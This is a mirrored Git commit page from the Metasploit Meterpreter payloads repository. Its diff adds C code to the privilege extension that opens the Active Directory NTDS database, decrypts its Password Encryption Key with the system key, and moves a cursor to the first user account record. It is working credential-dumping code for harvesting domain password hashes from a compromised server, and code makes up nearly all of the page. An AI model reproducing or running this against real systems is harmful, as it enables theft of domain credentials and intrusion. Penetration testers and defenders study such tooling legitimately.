github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-08 14:36:22 +01:00
Code Releases Activity

move to the first user record

Browse Source 
move through the datatable until we find
the first sam user object.

MSP-12356
This commit is contained in:
David Maloney 2015-04-23 16:51:07 -05:00
parent 9d5c3c1610
commit 52571872c4
3 changed files with 50 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
c/meterpreter/source/extensions/priv/server/ntds.c
View File

@ -67,13 +67,29 @@ DWORD ntds_parse(Remote *remote, Packet *packet){
memset(pekEncrypted, 0, sizeof(encryptedPEK));
memset(pekDecrypted, 0, sizeof(decryptedPEK));
// Get and Decrypt the Password Encryption Key (PEK)
pekStatus = get_PEK(ntdsState, accountColumns, pekEncrypted);
if (pekStatus != JET_errSuccess){
res = pekStatus;
engine_shutdown(ntdsState);
goto out;
}
if (!decrypt_PEK(sysKey, pekEncrypted, pekDecrypted)){
res = GetLastError();
engine_shutdown(ntdsState);
goto out;
}
// Set our Cursor on the first User record
JET_ERR cursorStatus = find_first(ntdsState);
if (cursorStatus != JET_errSuccess){
res = cursorStatus;
engine_shutdown(ntdsState);
goto out;
}
cursorStatus = next_user(ntdsState, accountColumns);
if (cursorStatus != JET_errSuccess){
res = cursorStatus;
engine_shutdown(ntdsState);
goto out;
}

32
c/meterpreter/source/extensions/priv/server/ntds_jet.c
View File

@ -43,6 +43,12 @@ JET_ERR engine_startup(jetState *ntdsState){
return JET_errSuccess;
}
JET_ERR find_first(jetState *ntdsState){
JET_ERR cursorStatus;
cursorStatus = JetMove(ntdsState->jetSession, ntdsState->jetTable, JET_MoveFirst, (JET_GRBIT)NULL);
return cursorStatus;
}
JET_ERR get_column_info(jetState *ntdsState, ntdsColumns *accountColumns){
JET_ERR columnError;
const char attributeNames[][25] = {
@ -109,6 +115,32 @@ JET_ERR get_PEK(jetState *ntdsState, ntdsColumns *accountColumns, encryptedPEK *
return readStatus;
}
JET_ERR next_user(jetState *ntdsState, ntdsColumns *accountColumns){
JET_ERR cursorStatus;
JET_ERR readStatus;
JET_ERR finalStatus = JET_errSuccess;
DWORD accountType = 0;
unsigned long columnSize = 0;
do{
cursorStatus = JetMove(ntdsState->jetSession, ntdsState->jetTable, JET_MoveNext, (JET_GRBIT)NULL);
if (cursorStatus != JET_errSuccess){
finalStatus = cursorStatus;
break;
}
//Retrieve the account type for this row
readStatus = JetRetrieveColumn(ntdsState->jetSession, ntdsState->jetTable, accountColumns->accountType.columnid, &accountType, sizeof(accountType), &columnSize, 0, NULL);
// Unless this is a User Account, then we skip it
if (readStatus == JET_wrnColumnNull){
continue;
}
else if (readStatus != JET_errSuccess){
finalStatus = readStatus;
break;
}
} while (accountType != 0x30000000);
return finalStatus;
}
JET_ERR open_database(jetState *ntdsState){
JET_ERR attachStatus = JetAttachDatabase(ntdsState->jetSession, ntdsState->ntdsPath, JET_bitDbReadOnly);
if (attachStatus != JET_errSuccess){

2
c/meterpreter/source/extensions/priv/server/ntds_jet.h
View File

@ -63,8 +63,10 @@ typedef struct{
JET_ERR engine_shutdown(jetState *ntdsState);
JET_ERR engine_startup(jetState *ntdsState);
JET_ERR find_first(jetState *ntdsState);
JET_ERR get_column_info(jetState *ntdsState, ntdsColumns *accountColumns);
JET_ERR get_PEK(jetState *ntdsState, ntdsColumns *accountColumns, encryptedPEK *pekEncrypted);
JET_ERR next_user(jetState *ntdsState, ntdsColumns *accountColumns);
JET_ERR open_database(jetState *ntdsState);
JET_ERR read_table(jetState *ntdsState, ntdsColumns *accountColumns, decryptedPEK *pekDecrypted);